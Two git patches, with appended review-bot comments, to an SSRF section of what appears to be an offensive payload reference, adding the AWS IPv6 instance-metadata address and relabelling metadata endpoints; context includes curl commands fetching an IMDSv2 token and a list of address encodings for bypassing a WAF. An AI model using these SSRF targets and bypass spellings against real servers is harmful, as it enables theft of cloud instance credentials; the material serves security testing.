From bb3f865e1051b516df41e6788cfabb5356df0082 Mon Sep 17 00:00:00 2001 From: Jonathan Leitschuh Date: Wed, 28 Jun 2023 18:51:53 -0400 Subject: [PATCH 1/2] Add new AWS IPv6 SSRF Endpoint Documentation: https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/instancedata-data-retrieval.html --- Server Side Request Forgery/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index db9ad9d..4b30650 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -557,6 +557,8 @@ The AWS Instance Metadata Service is a service available within Amazon EC2 insta curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" ``` +* IPv6 endpoint: `http://[fd00:ec2::254]/latest/meta-data/` + In case of a WAF, you might want to try different ways to connect to the API. * DNS record pointing to the AWS API IP ```powershell @@ -583,6 +585,7 @@ In case of a WAF, you might want to try different ways to connect to the API. http://[::ffff:a9fe:a9fe] IPV6 Compressed http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 + http://[fd00:ec2::254] IPV6 ``` From 97114171619e3c0fb33444aef4b218721c6ca593 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 29 Jun 2023 10:59:02 +0200 Subject: [PATCH 2/2] Update README.md --- Server Side Request Forgery/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 4b30650..3dd0a41 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -550,8 +550,8 @@ Example of a PDF attachment using HTML The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) -* Old endpoint: `http://169.254.169.254/latest/meta-data/` -* New endpoint requires the header `X-aws-ec2-metadata-token` +* IPv4 endpoint (old): `http://169.254.169.254/latest/meta-data/` +* IPv4 endpoint (new) requires the header `X-aws-ec2-metadata-token` ```powershell export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
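Review bot: In patch 1/2, the hunk at `@@ -557,6 +557,8 @@` places the new `* IPv6 endpoint:` bullet after the closing fence of the token example, so it is cut off from the other two endpoint bullets and does not say whether the `X-aws-ec2-metadata-token` header applies to it. Move it up beside the existing endpoint bullets and state the header requirement explicitly. The documentation URL cited in the commit message could also be linked next to the existing `[Docs]` entry, so the README itself carries the source for this address.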
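Review bot: In patch 1/2, the hunk at `@@ -583,6 +585,7 @@` adds `http://[fd00:ec2::254] IPV6` to a list whose other entries (`[::ffff:a9fe:a9fe]`, `[0:0:0:0:0:ffff:169.254.169.254]`) are all alternate spellings of 169.254.169.254, whereas this line is a different address rather than another encoding of it. The bare label `IPV6` is also easy to confuse with `IPV6 Compressed` and `IPV6 Expanded` directly above. Give the line a label that marks it as a separate endpoint, or keep it only in the endpoint bullet added by the first hunk.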
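Review bot: In patch 2/2, the hunk at `@@ -550,8 +550,8 @@` renames the bullets to `IPv4 endpoint (old)` and `IPv4 endpoint (new)`, but the labels still do not say what differs: both bullets and the example use the same address, 169.254.169.254, and the only difference shown is the `X-aws-ec2-metadata-token` header. Label them by the token requirement (for example "without token" and "with token header") instead of old/new. Separately, the context fence is tagged `powershell` while its content uses `export` and backtick command substitution, which is POSIX shell syntax; the tag is worth correcting while these lines are being touched.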